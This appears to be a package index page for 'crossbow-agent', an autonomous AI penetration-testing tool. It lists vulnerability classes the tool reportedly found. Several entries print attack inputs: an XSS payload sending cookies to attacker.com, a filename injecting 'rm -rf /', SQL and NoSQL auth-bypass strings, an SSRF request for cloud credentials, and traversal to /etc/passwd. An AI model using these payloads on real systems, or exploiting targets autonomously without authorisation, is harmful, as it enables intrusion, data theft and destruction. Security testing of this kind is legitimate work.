Skip to main content

World's first fully autonomous AI security engineer

Project description

Crossbow - World's First AI Security Engineer

World's first fully autonomous AI security engineer that finds and exploits vulnerabilities, performs SOC operations, forensics, and threat intelligence.

Installation

pip install crossbow-agent

Set your API key:

export OPENAI_API_KEY=your-key-here
# or ANTHROPIC_API_KEY or GEMINI_API_KEY

Usage

Start Crossbow:

crossbow

Ask it to test something:

🎯 > Find vulnerabilities in https://example.com
🎯 > Scan this Android app for security issues
🎯 > Check if 192.168.1.0/24 has any exposed services
🎯 > Review login.py for security bugs

Crossbow figures out what to test and how to test it. Results stream back as they're found.

Commands

/model     - Switch AI models (GPT, Claude, Gemini)
/memory    - Remember conversations across sessions
/status    - Show current settings
/quit      - Exit

Real World Bugs Crossbow Found Autonmously

Hardcoded Credentials in Firmware

Found hardcoded admin password in IoT camera firmware allowing unauthorized access to recorded video streams. Password was embedded in binary, accessible to anyone who downloaded the firmware update.

SQL Injection in Login Form

Discovered SQL injection in authentication endpoint. Entering admin'-- in username field bypassed password check and granted admin access. Database credentials were also exposed through error messages.

Exposed Admin Panel

Found admin dashboard at /admin with no authentication required. Panel allowed viewing all user data, changing passwords, and downloading database backups.

API Key Leak in JavaScript

Production API keys hardcoded in client-side JavaScript bundle. Keys had write access to production database and were visible in browser developer tools.

Insecure Direct Object Reference

Changed user_id parameter in URL from 1234 to 1235 and accessed another user's private messages, payment history, and personal information. No authorization check on server side.

Command Injection in File Upload

File upload feature didn't sanitize filenames. Uploading a file named test.pdf; rm -rf / executed shell commands on the server with web server privileges.

Session Fixation

Application accepted session IDs from URL parameters. Attacker could send victim a link with attacker's session ID, then hijack the session after victim logged in.

Cross-Site Scripting (XSS)

User input reflected in page without encoding. Injecting <script>fetch('https://attacker.com/?c='+document.cookie)</script> in search box stole session cookies.

Insecure File Permissions

Database backup files stored in web root with 777 permissions. Anyone could download backup_2024.sql containing all user passwords, credit cards, and personal data.

Missing Rate Limiting

Password reset endpoint had no rate limiting. Attacker could spray 10,000 password reset emails in minutes or brute force reset tokens.

XML External Entity (XXE)

XML parser processed external entities. Sending specially crafted XML file read /etc/passwd and other system files through error messages.

CORS Misconfiguration

API returned Access-Control-Allow-Origin: * with credentials allowed. Any website could make authenticated requests and steal user data.

Open Redirect

Login page had ?redirect= parameter with no validation. Phishing emails sent users to real login page which redirected to fake site after authentication.

JWT Secret Key Leak

JWT tokens signed with weak secret found in public GitHub repository. Attacker could forge admin tokens and access any account.

NoSQL Injection

MongoDB query built from user input without sanitization. Sending {"$ne": null} in password field bypassed authentication.

Server-Side Request Forgery (SSRF)

Image upload feature fetched images from URLs. Requesting http://169.254.169.254/latest/meta-data/ exposed AWS credentials and cloud infrastructure details.

Weak Cryptography

Passwords hashed with MD5 and no salt. Rainbow table attack cracked 60% of passwords in under an hour.

Race Condition in Payment

Submitting multiple simultaneous purchase requests with same payment method charged card once but delivered items multiple times.

Directory Traversal

Download endpoint allowed ../ in filename parameter. Requesting /download?file=../../../../etc/passwd exposed system files.

API Keys

Get a key from one of these:

  • OpenAI: platform.openai.com
  • Anthropic: console.anthropic.com
  • Google: aistudio.google.com

Add to .env file.

Disclaimer

Author is not responsible for damage if anyone use this tool for illegal tasks

Credits

Thanks for amazing prompts and tools in CAI we used some of them in Crossbow v1.

Legal

Crossbow is a hobby project and this will be always free for anyone to use.

License

MIT

Project details


Download files

Download the file for your platform. If you're not sure which to choose, learn more about installing packages.

Source Distribution

crossbow_agent-2.0.2.tar.gz (73.1 kB view details)

Uploaded Source

Built Distribution

If you're not sure about the file name format, learn more about wheel file names.

crossbow_agent-2.0.2-py3-none-any.whl (75.2 kB view details)

Uploaded Python 3

File details

Details for the file crossbow_agent-2.0.2.tar.gz.

File metadata

  • Download URL: crossbow_agent-2.0.2.tar.gz
  • Upload date:
  • Size: 73.1 kB
  • Tags: Source
  • Uploaded using Trusted Publishing? No
  • Uploaded via: twine/6.2.0 CPython/3.11.13

File hashes

Hashes for crossbow_agent-2.0.2.tar.gz
Algorithm Hash digest
SHA256 f377e96626d61ee39b143d75f851bf753369ee4ab2ae7a46599fb01015c2359d
MD5 c29b8687db5c75780c907929455ef61a
BLAKE2b-256 38b86fc88c6db116bbb63b472ea7ed1870005e6bed4a93fc3a74f8875ba00446

See more details on using hashes here.

File details

Details for the file crossbow_agent-2.0.2-py3-none-any.whl.

File metadata

  • Download URL: crossbow_agent-2.0.2-py3-none-any.whl
  • Upload date:
  • Size: 75.2 kB
  • Tags: Python 3
  • Uploaded using Trusted Publishing? No
  • Uploaded via: twine/6.2.0 CPython/3.11.13

File hashes

Hashes for crossbow_agent-2.0.2-py3-none-any.whl
Algorithm Hash digest
SHA256 7feb4ae01195a1d7a9fa51ad2706566b17ba5e56e1c9d089a054d049221e1d7c
MD5 64632c5ea660decf88686a3584bb8e3d
BLAKE2b-256 1c8bc5b67d62a6bcd18d36b743b1284e29deaf3fb6cfff99c43b679ab82d64ed

See more details on using hashes here.

Supported by

AWS Cloud computing and Security Sponsor Datadog Monitoring Depot Continuous Integration Fastly CDN Google Download Analytics Pingdom Monitoring Sentry Error logging StatusPage Status page